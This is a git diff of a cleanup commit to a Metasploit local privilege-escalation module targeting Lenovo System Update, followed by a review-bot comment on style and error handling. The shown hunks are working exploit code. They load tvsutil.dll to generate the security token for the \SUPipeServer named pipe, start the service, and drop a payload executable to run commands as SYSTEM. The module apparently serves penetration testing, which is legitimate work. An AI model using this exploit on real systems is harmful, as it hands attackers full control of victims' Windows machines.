Do minor code cleanup
parent
d99eedb1e4
commit
3aa1ffb4f5
|
@ -4,32 +4,31 @@
|
||||||
##
|
##
|
||||||
|
|
||||||
class Metasploit3 < Msf::Exploit::Local
|
class Metasploit3 < Msf::Exploit::Local
|
||||||
Rank = ExcellentRanking
|
|
||||||
|
|
||||||
include Msf::Exploit::EXE
|
include Msf::Exploit::EXE
|
||||||
include Msf::Post::File
|
include Msf::Post::File
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
include Msf::Post::Windows::Priv
|
include Msf::Post::Windows::Priv
|
||||||
include Msf::Post::Windows::Services
|
include Msf::Post::Windows::Services
|
||||||
|
|
||||||
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info={})
|
||||||
super(update_info(info, {
|
super(update_info(info, {
|
||||||
'Name' => 'Lenovo System Update Privilege Escalation',
|
'Name' => 'Lenovo System Update Privilege Escalation',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
The named pipe, \SUPipeServer, can be accessed by normal users to interact
|
The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
|
||||||
with the System update service. The service provides the possibility to execute
|
System update service. The service provides the possibility to execute arbitrary
|
||||||
arbitrary commands as SYSTEM if a valid security token is provided. This token can
|
commands as SYSTEM if a valid security token is provided. This token can be generated
|
||||||
be generated by calling the GetSystemInfoData function in the DLL tvsutil.dll
|
by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
|
||||||
|
System Update is stopped by default but can be started/stopped calling the Executable
|
||||||
Please note that the System Update is stopped by default but can be started/stopped calling
|
ConfigService.exe.
|
||||||
the Executable ConfigService.exe
|
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Micahel Milvich', # vulnerability discovery, advisory
|
'Micahel Milvich', # vulnerability discovery, advisory
|
||||||
'Sofiane Talmat', # vulnerability discovery, advisory
|
'Sofiane Talmat', # vulnerability discovery, advisory
|
||||||
'h0ng10' # Metasploit module
|
'h0ng10' # Metasploit module
|
||||||
],
|
],
|
||||||
'Arch' => ARCH_X86,
|
'Arch' => ARCH_X86,
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
|
@ -118,13 +117,14 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
|
|
||||||
def get_security_token(lenovo_directory)
|
def get_security_token(lenovo_directory)
|
||||||
if not client.railgun.get_dll('tvsutil') then
|
unless client.railgun.get_dll('tvsutil')
|
||||||
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
|
client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
|
||||||
client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
|
client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], windows_name = nil, calling_conv = 'cdecl')
|
||||||
end
|
end
|
||||||
|
|
||||||
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
|
dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
|
||||||
return dll_response['systeminfo'][0,40]
|
|
||||||
|
dll_response['systeminfo'][0,40]
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -139,23 +139,23 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
su_directory = service_info('SUService')[:path][1..-16]
|
su_directory = service_info('SUService')[:path][1..-16]
|
||||||
print_status("Starting service via ConfigService.exe")
|
print_status('Starting service via ConfigService.exe')
|
||||||
config_service(su_directory, "start")
|
config_service(su_directory, 'start')
|
||||||
print_status("Giving the service some time to start...")
|
|
||||||
sleep(datastore['sleep'])
|
print_status('Giving the service some time to start...')
|
||||||
|
Rex.sleep(datastore['Sleep'])
|
||||||
|
|
||||||
print_status("Getting security token...")
|
print_status("Getting security token...")
|
||||||
token = get_security_token(su_directory)
|
token = get_security_token(su_directory)
|
||||||
vprint_good("Security token is: #{token}")
|
vprint_good("Security token is: #{token}")
|
||||||
|
|
||||||
|
if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
|
||||||
if datastore['WritableDir'] and not datastore['WritableDir'].empty?
|
|
||||||
temp_dir = datastore['WritableDir']
|
|
||||||
else
|
|
||||||
temp_dir = get_env('TEMP')
|
temp_dir = get_env('TEMP')
|
||||||
|
else
|
||||||
|
temp_dir = datastore['WritableDir']
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Using #{temp_dir} to drop malicious exe")
|
print_status("Using #{temp_dir} to drop the payload")
|
||||||
|
|
||||||
begin
|
begin
|
||||||
cd(temp_dir)
|
cd(temp_dir)
|
||||||
|
@ -186,8 +186,8 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
fail_with(Failure::Unknown, 'Failed to write to pipe')
|
fail_with(Failure::Unknown, 'Failed to write to pipe')
|
||||||
end
|
end
|
||||||
|
|
||||||
print_status("Stopping service via ConfigService.exe")
|
print_status('Stopping service via ConfigService.exe')
|
||||||
config_service(su_directory, "stop")
|
config_service(su_directory, 'stop')
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
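Review bot: In the `get_security_token` hunk, the `add_function` call still passes `windows_name = nil, calling_conv = 'cdecl'` as positional arguments; these are local assignments dressed up as keyword arguments, so they create two unused locals and mislead the reader into thinking the parameters are being named. Since this commit is a cleanup pass, the call should become `client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')`. The DWORD result in `dll_response['return']` is also never inspected before `dll_response['systeminfo'][0,40]` is sliced, so a failed call would presumably hand back a truncated or garbage token and the failure would only surface later at the pipe write; a check on the return value before slicing would make that explicit, though the function's success value is not documented in the module and should be confirmed first. The bare `[0,40]` would read better with a comment such as `# the security token is the first 40 characters of the systeminfo buffer`.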